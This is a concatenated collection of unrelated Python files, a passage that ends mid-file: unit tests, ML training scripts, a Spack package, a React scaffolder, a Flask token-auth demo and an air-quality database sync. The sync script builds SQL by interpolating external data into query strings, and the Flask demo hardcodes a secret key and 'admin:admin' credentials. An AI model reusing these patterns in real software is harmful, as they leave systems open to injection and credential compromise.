self.assertTrue(not os.path.exists(file))
state = process_file_flag(False, file)
self.assertEqual(state, FileFlag.NO_EXIST)
self.assertTrue(not os.path.exists(file))
open(file, 'ab').close()
self.assertTrue(os.path.exists(file))
state = process_file_flag(False, file)
self.assertEqual(state, FileFlag.NO_EXIST)
self.assertTrue(os.path.exists(file))
def test_ff_read_existence(self):
with prepare_workdir() as work_dir:
file = os.path.join(work_dir, 'flag-exists')
open(file, 'ab').close()
state = process_file_flag(None, file)
self.assertEqual(state, FileFlag.EXISTS)
self.assertTrue(os.path.exists(file))
def test_ff_read_not_exists(self):
with prepare_workdir() as work_dir:
file = os.path.join(work_dir, 'flag-no-exist')
self.assertTrue(not os.path.exists(file))
state = process_file_flag(None, file)
self.assertEqual(state, FileFlag.NO_EXIST)
self.assertTrue(not os.path.exists(file))
|
import unittest
class TestDiagonalCosmoBNNPrior(unittest.TestCase):
"""A suite of tests alerting us for breakge, e.g. errors in
instantiation of classes or execution of scripts, for DiagonalBNNPrior
"""
def test_tdlmc_diagonal_cosmo_config(self):
"""Tests instantiation of TDLMC diagonal Config
"""
import baobab.configs as configs
cfg = configs.BaobabConfig.from_file(configs.tdlmc_diagonal_cosmo_config.__file__)
return cfg
def test_diagonal_cosmo_bnn_prior(self):
"""Tests instantiation and sampling of DiagonalBNNPrior
"""
from baobab.bnn_priors import DiagonalCosmoBNNPrior
cfg = self.test_tdlmc_diagonal_cosmo_config()
diagonal_cosmo_bnn_prior = DiagonalCosmoBNNPrior(cfg.bnn_omega, cfg.components)
return diagonal_cosmo_bnn_prior.sample()
if __name__ == '__main__':
unittest.main()
|
from __future__ import division
import sys
import argparse
import torch
import os
import torch.nn as nn
import torch.optim as optim
import numpy as np
import json
import pickle
from sklearn.metrics import average_precision_score
from torch.utils.data import Dataset, DataLoader
from dataloader import Loader
from model import Model
from myutils import AverageMeter, str2bool, convert_caps, collate, _pad
import ipdb
def test(loader, model):
model.eval()
num_correct = 0.
num_samples = 0.
combined = []
combined_labels = []
with torch.no_grad():
for i, d in enumerate(loader):
art_scores = model(d)
# ipdb.set_trace()
labels = d[-3]
num_samples += len(labels)
cls_idx = torch.argmax(art_scores, dim=1)
correct = cls_idx.cpu() == labels
correct = torch.sum(correct)
num_correct += correct
# debug
# if i == 0:
# scores = art_scores.cpu()
# else:
# scores = torch.cat((scores, art_scores.cpu()), dim=0)
acc = num_correct.item() / num_samples
# ipdb.set_trace()
# debug
# torch.save(scores, './run/results/test_acc_{}.pt'.format(acc))
return acc
def train(loader, model, opt, log_interval, epoch):
model.train()
losses = AverageMeter()
accs = AverageMeter()
for i, d in enumerate(loader):
labels = d[-3]
loss, art_scores = model(d)
loss = torch.mean(loss)
cls_idx = torch.argmax(art_scores, dim=-1)
# ipdb.set_trace()
acc = cls_idx.cpu().detach() == labels
acc = torch.sum(acc).float() / len(acc)
opt.zero_grad()
loss.backward()
opt.step()
num_items = len(d[0])
losses.update(loss.data, num_items)
accs.update(acc, num_items)
if i % log_interval == 0:
print('Train Epoch: {} [{}/{}]\t'
'Loss: {:.4f} ({:.4f})\t'
'acc: {:.4f} ({:.4f})'.format(
epoch, i * num_items, len(train_loader.dataset),
losses.val, losses.avg, accs.val, accs.avg))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-task", default='ext', type=str, choices=['ext', 'abs'])
parser.add_argument("-encoder", default='bert', type=str, choices=['bert', 'baseline'])
parser.add_argument("-mode", default='train', type=str, choices=['train', 'validate', 'test'])
parser.add_argument("-bert_data_path", default='./run/bert_data_new/cnndm')
parser.add_argument("-result_path", default='./run/results/cnndm')
parser.add_argument("-temp_dir", default='./run/temp')
parser.add_argument("-batch_size", default=2, type=int)
parser.add_argument("-test_batch_size", default=200, type=int)
parser.add_argument("-max_pos", default=512, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-large", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-load_from_extractive", default='../trained_models/model_step_148000.pt', type=str)
parser.add_argument("-sep_optim", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-lr_bert", default=2e-3, type=float)
parser.add_argument("-lr_dec", default=2e-3, type=float)
parser.add_argument("-use_bert_emb", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-share_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-finetune_bert", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-dec_dropout", default=0.2, type=float)
parser.add_argument("-dec_layers", default=6, type=int)
parser.add_argument("-dec_hidden_size", default=768, type=int)
parser.add_argument("-dec_heads", default=8, type=int)
parser.add_argument("-dec_ff_size", default=2048, type=int)
parser.add_argument("-enc_hidden_size", default=512, type=int)
parser.add_argument("-enc_ff_size", default=512, type=int)
parser.add_argument("-enc_dropout", default=0.2, type=float)
parser.add_argument("-enc_layers", default=6, type=int)
parser.add_argument("-img_feat_size", default=2048, type=int)
parser.add_argument("-num_objs", default=36, type=int)
parser.add_argument("-num_imgs", default=3, type=int)
parser.add_argument('--lr', type=float, default=1e-5, metavar='LR',
help='learning rate')
parser.add_argument('--beta1', type=float, default=0.5, metavar='B1',
help='beta1 for Adam Optimizer')
parser.add_argument('--beta2', type=float, default=0.999, metavar='B2',
help='beta2 for Adam Optimizer')
parser.add_argument("-log_interval", default=1600, type=int)
# params for EXT
parser.add_argument("-ext_dropout", default=0.2, type=float)
parser.add_argument("-ext_layers", default=2, type=int)
parser.add_argument("-ext_hidden_size", default=768, type=int)
parser.add_argument("-ext_heads", default=8, type=int)
parser.add_argument("-ext_ff_size", default=2048, type=int)
parser.add_argument("-label_smoothing", default=0.1, type=float)
parser.add_argument("-generator_shard_size", default=32, type=int)
parser.add_argument("-alpha", default=0.6, type=float)
parser.add_argument("-beam_size", default=5, type=int)
parser.add_argument("-min_length", default=15, type=int)
parser.add_argument("-max_length", default=150, type=int)
parser.add_argument("-max_tgt_len", default=140, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-warmup_steps_bert", default=8000, type=int)
parser.add_argument("-warmup_steps_dec", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='./run/logs/cnndm.log')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-test_start_from", default=-1, type=int)
parser.add_argument("-train_from", default='')
parser.add_argument("-captioning_dataset_path", default='./data/captioning_dataset.json', type=str)
parser.add_argument("-articles_metadata", default='./data/all_articles.pkl', type=str)
parser.add_argument("-fake_articles", default='./data/articles_out.jsonl', type=str)
parser.add_argument("-image_representations_dir", default='./data/images/object_representations', type=str)
parser.add_argument("-real_articles_dir", default='./data/real_arts/bert_data/', type=str)
parser.add_argument("-fake_articles_dir", default='./data/fake_arts/bert_data/', type=str)
parser.add_argument("-real_captions_dir", default='./data/real_caps/bert_data/', type=str)
parser.add_argument("-ner_dir", default='./data/named_entities/', type=str)
parser.add_argument("-model_dir", default='./data/models/')
parser.add_argument("-num_workers", default=4, type=int)
parser.add_argument("-test_with", default='fake-real', type=str)
parser.add_argument("-is_train", default='False', type=str)
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in range(len(args.visible_gpus.split(',')))]
args.world_size = len(args.gpu_ranks)
args.cuda = torch.cuda.is_available()
# This command should be placed before importing torch.
# os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
kwargs = {'num_workers': args.num_workers, 'pin_memory': True} if args.cuda else {}
if args.cuda:
torch.cuda.manual_seed(args.seed)
captioning_dataset = json.load(open(args.captioning_dataset_path, "rb"))
all_arts = pickle.load(open(args.articles_metadata, 'rb'))
art2id = {}
# ipdb.set_trace()
for i, art in enumerate(all_arts):
art2id[art] = i
p = open(args.fake_articles, 'r')
fake_articles = [json.loads(l) for i, l in enumerate(p)]
train_loader = DataLoader(Loader(args, 'train', captioning_dataset, art2id, fake_articles), batch_size=args.batch_size, shuffle=True, collate_fn=collate)
val_loader = DataLoader(Loader(args, 'valid', captioning_dataset, art2id, fake_articles), batch_size=args.batch_size, shuffle=False, collate_fn=collate, **kwargs)
test_loader = DataLoader(Loader(args, 'test', captioning_dataset, art2id, fake_articles), batch_size=args.batch_size, shuffle=False, collate_fn=collate, **kwargs)
device = 'cuda'
bert_from_extractive = None
model = Model(args, device, None, bert_from_extractive)
model = nn.DataParallel(model)
model.cuda()
parameters = filter(lambda p: p.requires_grad, model.parameters())
opt = optim.Adam(parameters, lr=args.lr, betas=(args.beta1, args.beta2))
check_pt_path = os.path.join(args.model_dir, args.test_with + '_check_pt.pth')
model_best_path = os.path.join(args.model_dir, args.test_with + '_model_best.pth')
if not os.path.exists(args.model_dir):
os.makedirs(args.model_dir)
# Training
if str2bool(args.is_train):
val_acc = None
for epoch in range(10):
train(train_loader, model, opt, args.log_interval, epoch)
acc = test(val_loader, model)
print('')
print('val accuracy: ' + str(acc * 100.))
torch.save(model.state_dict(), check_pt_path)
if val_acc is None or acc > val_acc:
val_acc = acc
torch.save(model.state_dict(), model_best_path)
print('')
# Testing
print('*Test with ', args.test_with)
# print('valid accuracy: ' + str(val_acc * 100.))
if not os.path.exists(model_best_path):
print('No such files: ' + model_best_path)
sys.exit(0)
else:
model.load_state_dict(torch.load(model_best_path))
acc = test(test_loader, model)
print('test accuracy: ' + str(acc * 100.))
|
import requests
import psycopg2
import psycopg2.extras
import urllib.parse as urlparse
import os
from lotify.client import Client
URL = urlparse.urlparse(os.getenv('DATABASE_URL'))
DB_NAME = URL.path[1:]
USER = URL.username
PASSWORD = URL.password
HOST = URL.hostname
PORT = URL.port
class Database:
conns = []
def __enter__(self):
return self
def connect(self):
conn = psycopg2.connect(
dbname=DB_NAME,
user=USER,
password=PASSWORD,
host=HOST,
port=PORT
)
self.conns.append(conn)
return conn
def __exit__(self, type, value, traceback):
for conn in self.conns:
conn.close()
self.conns.clear()
print('Check tables status...')
try:
with Database() as db, db.connect() as conn, conn.cursor(
cursor_factory=psycopg2.extras.RealDictCursor) as cur:
cur.execute(f'''
CREATE TABLE public.taiwan
(
site_name character varying(20) COLLATE pg_catalog."default" NOT NULL,
county character varying(20) COLLATE pg_catalog."default",
aqi character varying(10) COLLATE pg_catalog."default" DEFAULT 0,
status character varying(15) COLLATE pg_catalog."default",
update_time character varying(20) COLLATE pg_catalog."default",
CONSTRAINT taiwan_pkey PRIMARY KEY (site_name)
);
CREATE TABLE public.user_site
(
line_id character varying(50) COLLATE pg_catalog."default",
site_name character varying(20) COLLATE pg_catalog."default",
CONSTRAINT site UNIQUE (site_name)
);
CREATE TABLE public."user"
(
line_id character varying(50) COLLATE pg_catalog."default" NOT NULL,
notify_token character varying(100) COLLATE pg_catalog."default" NOT NULL,
CONSTRAINT user_pkey PRIMARY KEY (line_id)
)
TABLESPACE pg_default;
ALTER TABLE public.taiwan
OWNER to {USER};
ALTER TABLE public."user"
OWNER to {USER};
ALTER TABLE public.user_site
OWNER to {USER};
''')
conn.commit()
except psycopg2.errors.DuplicateTable:
print('Tables have been create.')
pass
except Exception as e:
raise Exception(e)
print('Search data......')
air_data = requests.get(
'http://opendata.epa.gov.tw/webapi/Data/REWIQA/?$orderby=SiteName&$skip=0&$top=1000&format=json')
airs = air_data.json()
if airs:
print("Get data success")
print("Connecting...")
print("Sync date to DB!!")
with Database() as db, db.connect() as conn, conn.cursor(
cursor_factory=psycopg2.extras.RealDictCursor) as cur:
for air in airs:
cur.execute(f'''
INSERT INTO taiwan (site_name, county, aqi, status, update_time)
VALUES (
'{air.get('SiteName')}',
'{air.get('County')}',
'{air.get('AQI')}',
'{air.get('Status')}',
'{air.get('PublishTime')}'
) ON CONFLICT ON CONSTRAINT taiwan_pkey
DO UPDATE SET
county = '{air.get('County')}',
aqi = '{air.get('AQI')}',
status = '{air.get('Status')}',
update_time = '{air.get('PublishTime')}'
''')
conn.commit()
print("Closing...Bye")
|
"""Compose. A command line utility for making React.js componets.
Composes helps you to create the structure for a React.js component,
following the View-Actions-index pattern.
"""
import argparse
import os.path
import re
import sys
from pathlib import Path
from typing import Dict, TextIO
INDEX = """\
import React from 'react'
import PropTypes from 'prop-types'
import Actions, {{ actionPropTypes }} from './Actions'
import View from './View'
const {name} = (props) => (
<View {{...props}} {{...Actions(props)}} />
)
const propTypes = {{ }}
{name}.displayName = '{name}'
{name}.propTypes = propTypes
View.propTypes = {{
...propTypes,
...actionPropTypes,
}}
export default {name}
"""
SIMPLE_INDEX = """\
import React from 'react'
import PropTypes from 'prop-types'
import styles from './styles.module.css'
const {name} = (props) => (
<></>
)
{name}.displayName = '{name}'
{name}.propTypes = {{ }}
export default {name}
"""
VIEW = """\
import React from 'react'
import styles from './styles.module.css'
const View = (props) => (
<>
</>
)
View.displayName = '{name}/View'
export default View
"""
ACTIONS = """\
import React from 'react'
import PropTypes from 'prop-types'
const Actions = (props) => {{ }}
export const actionPropTypes = {{ }}
export default Actions
"""
def make_args_parser():
parser = argparse.ArgumentParser(prog='compose', description=__doc__)
parser.add_argument('dir',
nargs='?',
type=Path,
default='.',
help='Directorio donde se creará el componente.')
parser.add_argument('component_name',
help='Nombre del componente creado.')
parser.add_argument('-y',
'--yes',
dest='skip_confirm',
action='store_true',
help='Saltarse confirmación. (Sí a todo)')
parser.add_argument('-s',
'--simple',
action='store_true',
help='Crear componente sin Actions ni View.')
return parser
def confirm(prompt: str, true_value: str) -> bool:
return input(prompt).casefold() == true_value.casefold()
def is_component_name(name: str) -> bool:
return re.match(r'^[A-Z][\w]*$', name) is not None
def render_template(file: TextIO, template: str, **context):
file.write(template.format(**context))
def make_component(name: str, base: Path, file_template_mapping: Dict[str,
str]):
root: Path = base / name
if not root.exists():
root.mkdir(parents=True)
context = {'name': name}
for path, template in file_template_mapping.items():
item_path: Path = root / path
with item_path.open('w') as file:
render_template(file, template, **context)
def get_templates(simple=False):
if simple:
return {'index.js': SIMPLE_INDEX, 'styles.module.css': ''}
return {
'index.js': INDEX,
'Actions.js': ACTIONS,
'View.js': VIEW,
'styles.module.css': '',
}
def main():
args = make_args_parser().parse_args()
base_path: Path = args.dir
component_name: str = args.component_name
if not is_component_name(component_name):
print(
'Error: El nombre del componente debe comenzar '
'en una letra mayúscula y no debe contener espacios.',
file=sys.stderr)
sys.exit(1)
templates = get_templates(simple=args.simple)
print('Esta operación resultará en el siguiente arbol de archivos:\n',
f'{base_path / component_name}{os.path.sep}')
def print_tree(filenames):
*filenames, last_filename = filenames
for filename in filenames:
print(f' |---- {filename}')
print(f' \\---- {last_filename}')
print_tree(templates.keys())
print('Si alguno de estos archivos ya existe, serán sobreescritos.')
if not args.skip_confirm and not confirm('¿Desea continuar? (s/n) ', 's'):
print('Operación cancelada.')
sys.exit(0)
make_component(component_name, base_path, templates)
print('Operación realizada exitosamente.')
if __name__ == '__main__':
main()
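# Example invocation (hypothetical file name; argparse declares prog='compose'):
#   python compose.py src/components MyButton -y
# creates src/components/MyButton/ with index.js, Actions.js, View.js and
# styles.module.css rendered from the templates above.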
|
import argparse
import cv_generator.themes
import logging
import os
import random
# Create the ArgumentParser and parse the arguments into `args`
parser = argparse.ArgumentParser(description='Run CV Generator')
parser.add_argument('--cv-file', required=True, help='Relative or absolute path to the raw .json or .yaml resume file')
# parser.add_argument('--theme', choices=['sitges', 'developer'], help='Name of the theme of the generated resume')
parser.add_argument('--filename', required=False, type=str, help='Generated file name, without extension')
parser.add_argument('--keep-tex', action='store_true', help='Keep LaTeX files used to generate the resume')
args = parser.parse_args()
# Define required files and folders
base_path = os.path.dirname(os.path.dirname(__file__))
cv_schema_path = os.path.join(base_path, 'cv.schema.json')
# Create a logging.Logger object to be used in the execution
logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger('cv_generator')
logger.propagate = True
# Create a new CV object with the data provided in the --cv-file argument
cv = cv_generator.CV(logger).load(args.cv_file, cv_schema_path)
# Get the child class of cv_generator.themes.BaseTheme to use
themes_dict = {
'developer': cv_generator.themes.ThemeDeveloper,
# 'sitges': cv_generator.themes.ThemeSitges
}
theme = themes_dict['developer'](cv, logger)
# Define the name (and path) of the generated file
file_name = args.filename if args.filename else '{}-{}'.format(theme.theme_name, random.randint(1, 1E6))
file_path = os.path.join(base_path, 'generated_documents') + os.sep + '{}'.format(file_name)
# Save the generated document in generated_file_path
theme.save(file_path, args.keep_tex)
logger.info('File {}.pdf generated inside /generated_documents'.format(file_name))
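# Example invocation (hypothetical script name):
#   python run.py --cv-file my_cv.yaml --filename my_resume --keep-tex
# loads my_cv.yaml, renders it with the 'developer' theme and writes
# generated_documents/my_resume.pdf, keeping the intermediate LaTeX sources.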
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
class Autoconf(AutotoolsPackage, GNUMirrorPackage):
"""Autoconf -- system configuration part of autotools"""
homepage = 'https://www.gnu.org/software/autoconf/'
gnu_mirror_path = 'autoconf/autoconf-2.69.tar.gz'
version('2.71', sha256='431075ad0bf529ef13cb41e9042c542381103e80015686222b8a9d4abef42a1c')
version('2.70', sha256='f05f410fda74323ada4bdc4610db37f8dbd556602ba65bc843edb4d4d4a1b2b7')
version('2.69', sha256='954bd69b391edc12d6a4a51a2dd1476543da5c6bbf05a95b59dc0dd6fd4c2969',
preferred=True)
version('2.62', sha256='83aa747e6443def0ebd1882509c53f5a2133f502ddefa21b3de141c433914bdd')
version('2.59', sha256='9cd05c73c5fcb1f5ccae53dd6cac36bb8cb9c7b3e97ffae5a7c05c72594c88d8')
# https://savannah.gnu.org/support/?110396
patch('https://git.savannah.gnu.org/cgit/autoconf.git/patch/?id=05972f49ee632cd98057a3caf82ebfb9574846da',
sha256='eaa3f69d927a853313a0b06e2117c51adab6377a2278549b05abc5df93643e16',
when='@2.70')
# Apply long-released, already in-use upstream patches to fix test cases:
# tests/foreign.at (Libtool): Be tolerant of 'quote' replacing the older `quote'
patch('http://mirrors.mit.edu/gentoo-portage/sys-devel/autoconf/files/autoconf-2.69-fix-libtool-test.patch',
sha256='7793209b33013dc0f81208718c68440c5aae80e7a1c4b8d336e382525af791a7',
when='@2.69')
# Fix bin/autoscan.in for current perl releases (reported already in January 2013)
patch('http://mirrors.mit.edu/gentoo-portage/sys-devel/autoconf/files/autoconf-2.69-perl-5.26.patch',
sha256='35c449281546376449766f92d49fc121ca50e330e60fefcfc9be2af3253082c2',
when='@2.62:2.69 ^perl@5.17:')
# Fix bin/autoheader.in for current perl releases not having "." in @INC:
patch('http://mirrors.mit.edu/gentoo-portage/sys-devel/autoconf/files/autoconf-2.69-perl-5.26-2.patch',
sha256='a49dd5bac3b62daa0ff688ab4d508d71dbd2f4f8d7e2a02321926346161bf3ee',
when='@2.62:2.69 ^perl@5.17:')
# Note: m4 is not a pure build-time dependency of autoconf. m4 is
# needed when autoconf runs, not only when autoconf is built.
depends_on('m4@1.4.6:', type=('build', 'run'))
depends_on('perl', type=('build', 'run'))
build_directory = 'spack-build'
tags = ['build-tools']
executables = [
'^autoconf$', '^autoheader$', '^autom4te$', '^autoreconf$',
'^autoscan$', '^autoupdate$', '^ifnames$'
]
@classmethod
def determine_version(cls, exe):
output = Executable(exe)('--version', output=str, error=str)
match = re.search(r'\(GNU Autoconf\)\s+(\S+)', output)
return match.group(1) if match else None
def patch(self):
# The full perl shebang might be too long; we have to fix this here
# because autom4te is called during the build
patched_file = 'bin/autom4te.in'
# We save and restore the modification timestamp of the file to prevent
# regeneration of the respective man page:
with keep_modification_time(patched_file):
filter_file('^#! @PERL@ -w',
'#! /usr/bin/env perl',
patched_file)
if self.version == Version('2.62'):
# skip help2man for patched autoheader.in and autoscan.in
touch('man/autoheader.1')
touch('man/autoscan.1')
# make installcheck would execute the testsuite a 2nd time, skip it
def installcheck(self):
pass
@run_after('install')
def filter_sbang(self):
# We have to do this after install because otherwise the install
# target will try to rebuild the binaries (filter_file updates the
# timestamps)
# Revert sbang, so Spack's sbang hook can fix it up
filter_file('^#! /usr/bin/env perl',
'#! {0} -w'.format(self.spec['perl'].command.path),
self.prefix.bin.autom4te,
backup=False)
def _make_executable(self, name):
return Executable(join_path(self.prefix.bin, name))
def setup_dependent_package(self, module, dependent_spec):
# Autoconf is very likely to be a build dependency,
# so we add the tools it provides to the dependent module
executables = ['autoconf',
'autoheader',
'autom4te',
'autoreconf',
'autoscan',
'autoupdate',
'ifnames']
for name in executables:
setattr(module, name, self._make_executable(name))
|
from xmlrpc.client import ServerProxy
url = "http://localhost:8080"
proxy = ServerProxy(url)
# text = u"This is my home"
# params = {"text":text, "align":"false", "report-all-factors":"false"}
#
# result = proxy.translate(params)
#
# print result['text']
#
# if 'id' in result:
# print "Segment ID:%s" % (result['id'])
#
# if 'align' in result:
# print "Phrase alignments:"
# aligns = result['align']
# for align in aligns:
# print "%s,%s,%s" %(align['tgt-start'], align['src-start'], align['src-end'])
def translate_text(data):
text_to_translate = data["text"]
params = {"text": text_to_translate, "align": "false", "report-all-factors": "false"}
result = proxy.translate(params)
response_object = {
'status': 'success',
'message': 'Successfully Translated.',
'Translation': result['text']
}
return response_object, 200
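# Illustrative usage (not part of the original module): send one sentence to
# the XML-RPC translation server assumed above at http://localhost:8080
# (a Moses-style interface, as suggested by the commented-out example).
if __name__ == "__main__":
    body, status_code = translate_text({"text": "This is my home"})
    print(status_code, body["Translation"])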
|
#!/usr/bin/env python
from functools import wraps
import types
import json
from flask import Flask, request, Blueprint, _request_ctx_stack
from flask_sqlalchemy import SQLAlchemy
from flask_security import Security, SQLAlchemyUserDatastore, UserMixin, RoleMixin, current_user
from flask_principal import identity_changed, Identity
from flask_restful import Api, Resource
from jenkins import JenkinsHelper
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SECRET_KEY'] = 'forgetme'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite://'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
_unauthenticated_response = json.dumps({'message': 'You must authenticate to perform this request'}), 401, {'Content-Type': 'application/json', 'WWW-Authenticate': 'Token realm="flask"'}
_unauthorized_response = json.dumps({'message': 'You are not authorized to perform this request'}), 401, {'Content-Type': 'application/json', 'WWW-Authenticate': 'Token realm="flask"'}
_forbidden_response = json.dumps({'message': 'You are not authorized to perform this request'}), 403, {'Content-Type': 'application/json'}
#
# UserDataStore Setup
#
db = SQLAlchemy(app)
roles_users = db.Table('roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id'))
)
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model, UserMixin):
id = db.Column(db.Integer(), primary_key=True)
api_key = db.Column(db.String(255), unique=True)
name = db.Column(db.String(50))
active = db.Column(db.Boolean())
roles = db.relationship('Role', secondary=roles_users, backref=db.backref('users', lazy='dynamic'))
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
@app.before_first_request
def create_realm():
db.create_all()
b = user_datastore.create_user(api_key='bobby', name='Bobby')
f = user_datastore.create_user(api_key='freddie', name='Freddie')
t = user_datastore.create_user(api_key='tommy', name='Tommy')
a = user_datastore.create_role(name='admin')
u = user_datastore.create_role(name='user')
user_datastore.add_role_to_user(b, a)
user_datastore.add_role_to_user(b, u)
user_datastore.add_role_to_user(f, u)
db.session.commit()
#
# Security Setup
#
user_bp = Blueprint('user_bp', __name__)
@app.before_request
def authenticate():
token = request.headers.get('Authorization')
if token:
user = User.query.filter_by(api_key=token).first()
if user:
# Hijack Flask-Login to set current_user
_request_ctx_stack.top.user = user
identity_changed.send(app, identity=Identity(user.id))
else:
            return _unauthorized_response
else:
return _unauthenticated_response
def authorize(role):
if not current_user.is_authenticated:
return _unauthenticated_response
if not current_user.has_role(role):
return _forbidden_response
return None
@user_bp.before_request
def authorize_user():
return authorize('user')
#
# API Resources
#
class Echo(Resource):
def put(self):
jh = JenkinsHelper('YWRtaW46YWRtaW4=')
queue = jh.build('echo')
if not queue is None:
return {'job': queue}, {'Content-Type': 'application/json'}
else:
return {'message': 'Failed to launch a job'}, 500
class Job(Resource):
def get(self, id):
jh = JenkinsHelper('YWRtaW46YWRtaW4=')
return {'status': jh.status(id)}
#
# API Endpoints
#
user_api = Api(user_bp)
user_api.add_resource(Echo, '/echo')
user_api.add_resource(Job, '/job/<id>')
#
# Run Flask
#
app.register_blueprint(user_bp)
if __name__ == '__main__':
app.run()
|
import pickle
import pandas as pd
from os import path
from scripts.config import params
from scripts.assemble_web_data import percentile, rescale_tsne
def assemble_web_data(raw_dir, processed_dir):
with open(path.join(processed_dir, 'x2i.pickle'), 'rb') as handle:
x2i = pickle.load(handle)
tsne_emb = pd.read_csv(path.join(processed_dir, 'tsne_emb.csv'))
tsne_emb = rescale_tsne(tsne_emb)
with open(path.join(processed_dir, 'recommendations.pickle'), 'rb') as handle:
recommendations = pickle.load(handle)
movies = pd.read_csv(path.join(raw_dir, 'movies.csv'))
links = pd.read_csv(path.join(raw_dir, 'links.csv'))
tags = pd.read_csv(path.join(raw_dir, 'genome-tags.csv'))
tag_score = pd.read_csv(path.join(raw_dir, 'genome-scores.csv'))
raw_ratings = pd.read_csv(path.join(raw_dir, 'ratings.csv'))
tags = tag_score.merge(tags, on='tagId')
tags = tags.groupby('movieId').apply(lambda x: ', '.join(
[y.tag for y in x.sort_values('relevance', ascending=False).iloc[:10, :].itertuples()]))
movies = movies.merge(links, on='movieId', how='outer')
movies = {x.movieId: (x.title, x.genres, x.imdbId)
for x in movies.itertuples()}
ds = pd.read_csv(path.join(processed_dir, 'ds.csv'))
freq = ds.groupby('item')['user'].count()
freq_pct = percentile(freq)
agr = raw_ratings.groupby('movieId')['rating'].mean().reset_index()
agr['movieId'] = agr['movieId'].apply(
lambda x: x2i[x] if x in x2i else None)
agr = agr[agr['movieId'].notna()].reset_index(drop=True)
    # Assign the sorted frame back (the bare sort_values call had no effect).
    agr = agr.sort_values('movieId').reset_index(drop=True)
avg_rating = agr['rating']
avg_rating_pct = percentile(avg_rating)
i2x = {v: k for k, v in x2i.items()}
nmovies = len(x2i)
web = pd.DataFrame({'idx': [*range(nmovies)],
'x': tsne_emb['x'][:-1],
'y': tsne_emb['y'][:-1],
't_name': [movies[i2x[i]][0] for i in range(nmovies)],
't_genres': [', '.join(movies[i2x[i]][1].split('|')) for i in range(nmovies)],
't_tags': [tags.at[i2x[i]] if i2x[i] in tags.index else '' for i in range(nmovies)],
'recommend_value': recommendations,
'n_recommend_pct': percentile(pd.Series(recommendations)),
'avg_rating': avg_rating,
'n_avg_rating_pct': avg_rating_pct,
'freq': freq,
'n_freq_pct': freq_pct,
'ml_id': [i2x[i] for i in range(nmovies)],
'imdb_id': [movies[i2x[i]][2] for i in range(nmovies)]})
web.to_csv(path.join(processed_dir, 'web.csv'),
index=False, float_format='%.5f')
if __name__ == '__main__':
common_params = params['ml']['common']
assemble_web_data(common_params['raw_dir'],
common_params['proc_dir'])
|
# With 240 contest minutes available and k minutes reserved to reach the party,
# count how many problems fit when problem i takes 5*i minutes to solve.
n, k = list(map(int, input().split()))
time = 240
diff = time - k
t = 0
prob = 0
for i in range(1, n + 1):
    if (t + 5 * i) <= diff:
        t = t + 5 * i
        prob += 1
print(prob)
|
import numpy as np
import logging
from ncon import ncon
from . import umps_mpoevolve
from . import mcmps_mpoevolve_real
from .McMPS import McMPS
from .UMPS import UMPS
version = 1.0
parinfo = {
"mps_chis": {
"default": range(1,31),
"idfunc": lambda dataname, pars: True
},
"ground_umps_chis": {
"default": None,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["ground_umps_chis"]
and not tuple(pars["ground_umps_chis"]) == tuple(pars["mps_chis"])
)
},
"mps_eps": {
"default": 1e-5,
"idfunc": lambda dataname, pars: True
},
"verbosity": {
"default": np.inf,
"idfunc": lambda dataname, pars: False
},
# Generating UMPS ground states.
# TODO See umps_mpoevolve for why these are used here.
"euclideon_spacestep": {
"default": 1,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"euclideon_padding": {
"default": 3,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"euclideon_eps": {
"default": 1e-5,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"euclideon_chis": {
"default": range(1,7),
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"initial_timestep": {
"default": 50,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"min_timestep": {
"default": 1/8,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"timestep_decreasant": {
"default": 0.8,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"max_counter": {
"default": 1000,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"max_subcounter": {
"default": 15,
